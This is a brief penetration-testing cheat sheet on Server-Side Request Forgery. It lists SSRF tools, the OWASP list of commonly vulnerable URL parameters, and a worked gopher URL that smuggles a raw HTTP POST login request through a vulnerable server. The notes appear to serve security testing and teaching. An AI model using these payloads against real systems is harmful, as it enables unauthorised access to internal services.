SSRF

Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to coerce the server into making requests to arbitrary URLs.

Tools & Resources

• https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet

• https://github.com/swisskyrepo/SSRFmap

• https://github.com/tarunkant/Gopherus

• https://app.interactsh.com/

• https://owasp.org/www-project-top-25-parameters

Finding SSRF Vectors

To identify potential SSRF vectors, locate GET or POST parameters used by the web application to access other resources via explicit or implicit external calls.

The OWASP top 25 vulnerable parameters list, as of the time of writing, contains:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}

Using Gopher to send POST data

There is no way to send a POST request with the HTTP URL scheme. Instead, we can use the gopher URL scheme to send arbitrary bytes to a TCP socket. This protocol enables us to create a POST request by building the HTTP request ourselves.

Suppose you want to send a POST request to login.php with username sfoffo and password admin. To send a POST request with that data, you need to URL-Encode all special characters to construct a valid gopher URL. In particular, spaces (%20) and newlines (%0D%0A) must be URL-encoded.

After that, prefix the data with the gopher URL scheme, the target host and port, and an underscore, resulting in the following gopher URL:

gopher://example.sfoffo:80/_POST%20/login.php%20HTTP%2F1.1%0D%0AHost:%20example.sfoffo%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Ausername%3Dsfoffo%26password%3Dadmin